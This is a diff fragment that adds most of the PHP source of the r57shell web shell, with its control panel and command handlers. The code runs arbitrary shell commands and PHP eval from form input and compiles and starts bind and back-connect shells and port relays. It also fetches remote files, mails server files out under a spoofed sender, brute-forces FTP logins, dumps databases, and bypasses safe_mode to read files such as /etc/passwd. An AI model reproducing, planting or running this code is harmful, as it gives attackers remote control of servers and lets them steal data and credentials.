+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b><br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';	
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");	
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {	
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   	
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); }
+ else 
+  {   	
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {	
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }	
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }	
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");	
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);	
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);	
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;	
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {	
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);	
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];	
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; 	
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';	
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
